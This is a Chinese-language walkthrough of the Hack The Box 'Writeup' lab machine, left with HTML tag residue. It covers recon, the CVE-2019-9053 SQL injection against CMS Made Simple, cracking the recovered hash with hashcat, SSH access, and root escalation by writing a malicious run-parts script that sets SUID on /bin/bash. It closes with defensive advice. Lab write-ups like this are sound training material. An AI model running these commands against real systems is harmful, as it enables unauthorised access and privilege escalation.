HTB Writeup 渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用
nmap<\/code> 进行初始端口扫描，发现开放端口：

22 (SSH)<\/li>
80 (HTTP)<\/li>
<\/ul>
<\/li>
<\/ul>
1.2 域名发现<\/h3>

访问IP地址发现提示两个域名：

writeup.htb<\/code><\/li>
www.hackthebox.eu<\/code><\/li>
<\/ul>
<\/li>
将这两个域名添加到本地hosts文件进行解析<\/li>
<\/ul>
1.3 备份文件扫描<\/h3>

使用 gobuster<\/code> 扫描可能的备份文件，但未发现有用信息<\/li>
<\/ul>
1.4 深入端口扫描<\/h3>

发现80端口状态为 tcpwrapped<\/code>，进行针对性扫描<\/li>
发现 \/writeup\/<\/code> 路径，运行的是 CMS Made Simple<\/strong> 系统<\/li>
<\/ul>
2. 漏洞利用阶段<\/h2>
2.1 CMS Made Simple 漏洞利用<\/h3>

查找并利用CMS Made Simple的已知漏洞<\/li>
使用基于时间盲注的PoC脚本(CVE-2019-9053)

注意：由于网络延迟，该脚本需要在pwn box上执行<\/li>
<\/ul>
<\/li>
获取的关键信息：
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
<\/code><\/pre>
<\/li>
<\/ul>
2.2 密码破解<\/h3>

使用hashcat破解获取的哈希：
hashcat -m 20<\/span> -a 0<\/span> -o cracked.txt --username hash.txt \/usr\/share\/seclists\/Passwords\/Leaked-Databases\/rockyou.txt
<\/span><\/span><\/code><\/pre><\/li>
破解结果：

用户名: jkr<\/li>
密码: raykayjay9<\/li>
<\/ul>
<\/li>
<\/ul>
3. 权限提升阶段<\/h2>
3.1 初始访问<\/h3>

使用SSH登录系统：
ssh jkr@<target_ip>
<\/span><\/span><\/code><\/pre>密码: raykayjay9<\/li>
<\/ul>
3.2 信息收集<\/h3>

上传 linpeas.sh<\/code> 脚本进行本地提权点检测<\/li>
发现用户属于 staff<\/code> 组<\/li>
<\/ul>
3.3 利用staff组权限<\/h3>

根据HackTricks的提权方法：

staff<\/code> 组允许用户对 \/usr\/local<\/code> 目录进行修改<\/li>
目标是劫持 run-parts<\/code> 工具<\/li>
<\/ul>
<\/li>
<\/ul>
提权步骤：<\/h4>

创建恶意 run-parts<\/code> 脚本：
echo '#! \/bin\/bash'<\/span> > \/usr\/local\/bin\/run-parts
<\/span><\/span>echo 'chmod 4777 \/bin\/bash'<\/span> >> \/usr\/local\/bin\/run-parts
<\/span><\/span><\/code><\/pre><\/li>
添加执行权限：
chmod +x \/usr\/local\/bin\/run-parts
<\/span><\/span><\/code><\/pre><\/li>
等待系统或用户通过SSH登录触发脚本<\/li>
获取root shell：
\/bin\/bash -p
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. 关键知识点总结<\/h2>


CMS Made Simple漏洞<\/strong>：CVE-2019-9053是基于时间盲注的漏洞，可提取敏感信息<\/p>
<\/li>

密码破解<\/strong>：使用hashcat模式20（salt+pass）进行破解<\/p>
<\/li>

Linux提权<\/strong>：<\/p>

staff<\/code> 组的特殊权限<\/li>
\/usr\/local<\/code> 目录的可写性利用<\/li>
run-parts<\/code> 工具的劫持方法<\/li>
<\/ul>
<\/li>

权限维持<\/strong>：通过设置SUID位(chmod 4777<\/code>)来维持权限<\/p>
<\/li>
<\/ol>
5. 防御建议<\/h2>


CMS安全<\/strong>：<\/p>

及时更新CMS系统<\/li>
限制管理后台访问<\/li>
<\/ul>
<\/li>

密码安全<\/strong>：<\/p>

使用强密码策略<\/li>
避免使用已知泄露密码<\/li>
<\/ul>
<\/li>

系统权限<\/strong>：<\/p>

严格控制staff<\/code>组成员<\/li>
监控\/usr\/local<\/code>目录的修改<\/li>
定期检查SUID\/SGID文件<\/li>
<\/ul>
<\/li>
<\/ol>